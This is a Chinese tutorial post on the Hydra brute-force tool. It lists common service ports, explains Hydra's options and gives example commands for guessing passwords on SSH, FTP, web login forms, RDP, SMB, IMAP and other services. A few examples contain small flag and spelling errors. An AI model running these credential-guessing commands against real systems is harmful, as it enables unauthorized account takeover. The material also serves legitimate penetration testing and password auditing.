hydra是一个网络帐号破解工具,支持多种协议。hydra是著名组织
thc
的一款开源的暴力破解密码工具,功能非常强大.kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大以及电脑的性能。我们今天就介绍下这款工具。
🍑介绍
我们首先要对开启端口的服务有一个清楚的认识,从2018年到至今以来,网站的防护的安全保护也已经上升了一个等级,但是由于管理员的安全意识薄弱,网站弱口令漏洞依然猖獗,可以看看补天的漏洞提交记录,发现弱口令依然是漏洞中的佼佼者。
当然弱口令并不仅限于网站的后台登陆弱口令,还包括有端口
比如 :
Ftp:21
ssh:22
Telnet:23
Pop3:110
3389远程登陆
8080中间件Tomcat
7001中间件Weblogic
3306 Mysql数据库(phpmyadmin)
1433 SQLServer数据库
5432 Postgresql数据库
端口扫描不用多讲,我还是觉得nmap
好一点
但是批量扫的话,丢包率可能高一点
对于端口的爆破,首先要有一个好的字典,然后再有一个好的工具
工具的话,python
脚本,超级弱口令检测工具等等很多
但这里主要介绍kali
里面hydra的爆破
因为hydra支持几乎所有协议的在线密码破解,并且容错率好
不过能不能爆破成功还是需要你有一个好的字典
⚔️Hydra
🥦基本语法
语法:Hydra 参数 IP 服务
🍉参数详解
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)-M <FILE>指定目标列表文件一行一条-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o <FILE>输出文件
-t 指定多线程数量,默认为16个线程-w TIME 设置最大超时的时间,单位秒,默认是30s
-vV 显示详细过程
server 目标IP
service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。
service
:指定服务名,支持的服务跟协议有:telnet
,ftp
,pop3
等等
注意点:
1. 自己创建字典,然后放在当前的目录下或者指定目录
2. 参数可以统一放在最后,格式比如hydra ip 服务 参数
3. 如果能确定用户名一项时候,比如web登录破解,直接用-l
就可以,然后剩余时间破解密码
4. 缺点:如果目标网站登录时候需要验证码就无法破解
5. man hydra最万能
6. 或者hydra -U http-form
等查看具体帮助。
🍊使用实例
爆破SSh:22端口命令:
hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh
爆破Ftp:21端口命令
(指定用户名为root):
hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftp
Get方式提交,破解web登录
(指定用户名为admin):
hydra -L user.txt -p password.txt -t 线程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 线程 -vV -e ns -f ip http-get /admin/index.php
Post方式提交,破解web登录:
hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
参数说明:-t
同时线程数3
-l
用户名是admin
字典pass.txt
保存为out.txt
-f
当破解了一个密码就停止
10.36.16.18
目标ip
http-post-form
表示破解是采用http的post方式提交的表单密码破解
<title>
中的内容是表示错误猜解的返回信息提示
破解Https:
hydra -m /index.php -l admin -P password.txt 192.168.0.132 https
破解Yeamspeak:
hydra -l admin -P passworrd.txt -s 端口号 -vV 192.168.0.132 teamspeak
破解Cisco:
hydra -P password.txt 192.168.0.132 cisco
hydra -m cloud -P password.txt 192.168.0.132 cisco-enable
破解Smb:
hydra -l administrator -P password.txt 192.168.0.132 smb
破解Pop3:
hydra -l root -P password.txt my.pop3.mail pop3
破解Rdp(3389端口):
hydra -l administrator -P password.txt -V 192.168.0.132 rdp
破解Http-proxy:
hydra -l admin -P passwprd.txt http-proxy://192.168.0.132
破解Imap:
hydra -L user.txt -p secret 192.168.0.132 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
原文始发于微信公众号(猫因的安全):神兵利器 | Hydra:【九头蛇】万能暴力破解工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论